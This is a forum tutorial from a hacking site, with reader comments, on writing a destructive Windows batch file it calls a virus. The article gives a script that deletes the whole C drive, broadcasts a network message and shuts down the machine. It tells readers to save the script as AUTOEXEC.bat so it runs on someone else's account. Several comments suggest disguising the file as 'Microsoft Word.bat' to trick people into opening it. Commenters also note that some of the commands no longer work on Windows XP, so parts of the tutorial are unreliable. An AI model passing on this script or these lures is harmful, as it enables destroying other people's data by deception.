Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Constructing an easy virus


Constructing an easy virus

By ghostghost | 7649 Reads |
0     0

INTRO:

This article is based on .bat files that can be coded for malicious pruposes. This "batch programming," would be an easy thing to write for someone who knows how to work DOS and it's commands. I personally don't consider this a "virus," but more of a, "Specially crafted computer f*cker." Seeing as most people call this kind of coding a "virus," and i bet it got your attention, i'll leave the title as is. Everyone reading this sould first know how to use DOS and it's commands appropriately. If not, i suggest you read up on it so you can make a personal "virus," instead of the ones shown in this article. If you're a Unix and/or Linux user, DOS is basically the equivalent of a terminal. DOS just has the commands worded differently and some even work differently. Seeing as most people use Windows, i'll base my article on Windows COmmands.

THE BASICS:

Let's see what DOS is really about before we continue. To get to DOS, go to the start button, run, then in the box type either cmd or command, and press enter. As in most cases, this should be blocked to normal users. I won't explain how to get past this because there are several articles already on this. You can type help and read up on how the commands work. When you're pretty used to it and what it can do, continue to my next paragraph. Now that you know what DOS is, or at least you should, we'll go into the two file types (there may be more) that will be used to use DOS to it's "full advantage." ;) These two file types are .cmd (command) and .bat (batch). These two commands will run right through DOS, annonymously if used correctly. The file type we will be using is .bat.

SEEING HOW IT WORKS:

Just so you see how a simple .bat works, go to Notepad and make a file called test. Now, remember what directory it's in and the folders/sub-folders you saved it into. Now, go to Notepad and type:

copy H:\test.txt H:\test

Now, save this as anything with a .bat extension(like, test.bat). It is not in the pull-down list, you will have to manually write it in. Now, go to the directory/folder/sub-folder area you saved it to. Then, double-click the .bat file. What should happen is a black box should pop up and dissapear pretty quickly. Now, depending on how big the file is and how fast you're computer is, you may end up viewing the command processing. When it gets done, the box will dissapear. Now, go to where you saved the file (H:\test) and see if file.txt is there. If it is, congradulations, you just wrote your first batch program. Very basic, i know, but it gets you some practice with it.

SAVES:

There are two different saving techniques. The batch file you made above worked when you double-clicked the file. There is another save that will auto-execute itself on login. Delete your file.txt file(s) created from your last command and go back to notepad and write this:

copy H:\file.txt H:\file

(switching out for your own directory and folder). Now, you want to save this one as AUTOEXEC.bat. Save it into the c:, if you don't have access, do it in DOS or just use another batch file, you should know how to do it by now.

(*hint) copy H:\AUTOEXEC.bat C:\

Now, restart your computer and login. YOu should see the same thing happen as your last command, but this time, without clicking it. Once you're finally logged in, if you didn't see the command process, go check where you saved it to and see if the file (file.txt) is there. If it is there, you just accomplished a different save style.

CONSTRUCTING:

Now that you know how to work the different saves and you know how the batch is executed, let's compile a basic "virus." Write these commands without the //'d words:

@echo off //Turns the echo off, so it won't display on screen, discreet if command completes fast

deltree c:\* /y //deletes the entire C drive without prompting on deletion

Net Send * "The System is Down" //sends a message to everyone on the network

shutdown -s //shuts down the computer, need admin-like priveledges for this command to process.

Take out the extra spaces. What that will do is execute those commands and then shut down the computer. I suggest using the AUTOEXEC.bat so it would execute itself on someone else's account. If net send is blocked on your computer, do not use it. The command will stop at net send if it is blocked correctly.

PROTECTION:

This may sound like a nightmare for any administrator, but it isn't. To fix this all you have to do is boot up into safe mode and find where the file is and delete it. Then you may have to fix whatever damage was done by the code.

END:

Now that you know how to work the "virus," be creative. Like, if all you want to do is shutdown the computer as soon as it starts up, simply write:

shutdown -s

Then, save it as AUTOEXEC.bat. There are several switches for that command, but remember that the user needs admin qualities for that command to execute. This was a very basic article and if you want to learn more, there's always google.

CREDITS:

I, nor this site, take any responsability for what you do with this information. THis article was wrote and meant for educational purposes only.

Nights Shadow

Comments
ghost's avatar
ghost 19 years ago

Well, considering you can't actually deltree C last I checked.. It's not too bad, a little too far into malicious intentions, without enough supporting knowledge, but most newbies start here. Brava.

ghost's avatar
ghost 19 years ago

nah it no a virus… but meh, lol try START ME.BAT

AND SAVE IT AS ME.BAT, ITS HIRARIUOS… anyhwo, deltree c doesnt work in XP you can try it i cant rememeber the way round it but i think there was on involving NULL

ghost's avatar
ghost 19 years ago

Nor does XP use AUTOEXEC.bat anymore (well, that's a lie you can still use it for env. var's) so that rders it somewhat useless. Deltree does not work in XP either, that also takes away a few points. Again, like the VB one, this is merely annoying, it is freestanding (whatever uses batch interpreter), does not propagate itself, etc.

Learn a programming language, learn some system internals, and go to 29a: http://29a.vx.netlux.org/main.html

ghost's avatar
ghost 18 years ago

Lol tries on own computer

Rofl wolf, far more effective is saving it as DONOTOPENTHIS.BAT, as some noob is bound to come along and open it out of curiosity…

ghost's avatar
ghost 18 years ago

lol i made this one little one similar,and i almost opened it into my own comp

thk-geo's avatar
thk-geo 18 years ago

If netsend is blocked you can use "Msg * ''The System is Down''" Good article though

ghost's avatar
ghost 17 years ago

Change Microsoft word's name to something else and then save it as Microsoft Word.bat, some idiot will be bound to click on it. And also, I doubt Deltree works on xp too, because you're not allowed to just format xp computers.

ghost's avatar
ghost 17 years ago

LAME faggot thing here.

A batch virus haha you gotta be kidding.

Night_Stalker's avatar
Night_Stalker 17 years ago

if u put net send then delltree c: */y would it delete all networks c:\s?

ghost's avatar
ghost 17 years ago

hm…doesn't it say, "It's not a virus" - > I personally don't consider this a "virus," but more of a, "Specially crafted computer f*cker."

Maybe some people (coughx2fusion*/cough*) should read the article and not just the title ;)